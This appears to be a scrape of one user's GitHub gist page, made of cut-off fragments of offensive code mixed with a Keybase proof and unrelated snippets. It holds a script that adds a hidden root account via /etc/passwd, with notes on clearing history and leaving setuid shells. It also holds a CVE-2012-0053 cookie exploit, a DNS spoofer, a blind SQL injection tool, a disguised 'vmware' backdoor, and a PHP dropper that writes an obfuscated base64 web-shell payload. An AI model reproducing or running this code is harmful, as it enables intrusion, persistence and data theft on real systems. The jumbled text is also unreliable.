# TODO
# copy binaries to new location, execute from said location. ensure ps command filters out commands
#PORT="1337"
# Add users, cat ssh key for ssh key access, clear history, copy shells with sguid bit set to hidden files for later use
deluser news > /dev/null 2>&1
deluser list > /dev/null 2>&1
sed '7ilist:x:0:0:list,,,,:/:/bin/bash' /etc/passwd > /tmp/out.txt && cat /tmp/out.txt > /etc/passwd && rm /tmp/out.txt

Keybase proof

I hereby claim:

  • I am sbehrens on github.
  • I am arbit (https://keybase.io/arbit) on keybase.
  • I have a public key whose fingerprint is 3BCB 4364 EF4A 3F6A C890 A755 18B8 EFD6 D8EE 14EA

To claim this, I am signing this object:

@sbehrens
sbehrens / CVE-2012-0053.js
Created June 18, 2012 16:36 — forked from btoews/CVE-2012-0053.js
CVE-2012-0053 Exploit
(function(d){
desired_length = 8192;
for(cookie_val = '=';cookie_val.length<=97;cookie_val+="A"){};
for(i=100;(desired_length-d.cookie.length)>111;i++,d.cookie=i+cookie_val){};
for(cookie_val="999=";(cookie_val.length + d.cookie.length + 9) <= desired_length;cookie_val += "A"){};
d.cookie = cookie_val;
d.cookie = "888=8";
x = new XMLHttpRequest();
x.onreadystatechange = function(){
if (x.readyState == 4 && x.status == 400){
@sbehrens
sbehrens / stream_cipher.py
Last active December 10, 2015 20:18
Break stream cipher
import array
import base64
import copy
# Found X0R cipher on an app assessment? Got the ciphertext and know the plaintext? Use this to get the key.
cipher_text = array.array('B', base64.b64decode("Some Blob of base64 encoded ciphertext remove decoder if not base64"))
plain_text = array.array('B', "some known plaintext value")
def decode_string(x, f):
colon = x.index(':', f)
try:
n = int(x[f:colon])
except (OverflowError, ValueError):
n = long(x[f:colon])
if x[f] == '0' and colon != f+1:
raise ValueError
colon += 1
CON
_clkmode = xtal1 + pll16x
_xinfreq = 5_000_000
VAR
long foodude
long datatown
byte hello
@sbehrens
sbehrens / fakedns.py
Created June 20, 2012 18:43 — forked from btoews/fakedns.py
Nice DNS Spoofer
# File: fakedns.py
# Name: Interactive CLI DNS Spoofer
# by: @mastahyeti
#
# based off of http://code.activestate.com/recipes/491264/
from __future__ import print_function
from gevent.event import Event
from gevent.pool import Pool
from gevent import socket
<?PHP
$b = 'bas'.'e64'.'_de'.'code';
file_put_contents('/tmp/asd', $b('P D 9 Q S F A K Z n V u Y 3 R p b 2 4 g b G x l a H M o J G N t Z C w g J G F y c m F 5 I D 0 g d H J 1 Z S l 7 C i A g I C B p Z i A o I W V t c H R 5 K C R j b W Q p K X s K I C A g I C A g I C B p Z i A o Y G V j a G 8 g Y W A p e y A k c 2 F s a W R h W 1 0 9 K G A k Y 2 1 k Y C k 7 I C R z Y W x p Z G F b X T 0 n T W 9 k b z o g Y C R j b W R g J z t 9 C i A g I C A g I C A g C i A g I C A g I C A g Z W x z Z W l m I C h z a G V s b H B v c G V u K C d l Y 2 h v I G E n K S l 7 J H N h b G l k Y V t d P X N o Z W x s c G 9 w Z W 4 o J G N t Z C k 7 I C R z Y W x p Z G F b X T 0 n T W 9 k b z o g c G 9 w Z W 4 o J G N t Z C k n O 3 0 K I C A g I C A g I C A K I C A g I C A g I C B l b H N l a W Y g K H N o Z W x s X 2 V 4 Z W M o J 2 V j a G 8 g Y S c p K X s k c 2 F s a W R h W 1 0 9 c 2 h l b G x f Z X h l Y y g k Y 2 1 k K T s g J H N h b G l k Y V t d P S d N b 2 R v O i B z a G V s b F 9 l e G V j K C R j b W Q p J z t 9 C i A g
# vmware backdoor: if the dir doesn't exist (which it should) create it anyway
mkdir -p /usr/lib/vmware-tools/bin32
vmwarestamp="`ls -l /usr/bin/lsof 2>log.error | awk {'print $6'}`"
echo $vmwarestamp
touch ./vmware-vnet1
chmod 755 ./vmware-vnet1
read -d '' vmware <<"BLOCK"
#!/bin/bash
@sbehrens
sbehrens / sql.py
Created December 7, 2011 17:06
SQL Injection Tool
##NOT FINISHED##
## ©mastahyeti 2011##
import urllib2
import urllib
import time
import math
CHARSET = [chr(x) for x in xrange(32,39)] + [chr(x) for x in xrange(40,127)] #everything but '
CHARSET_LEN = len(CHARSET)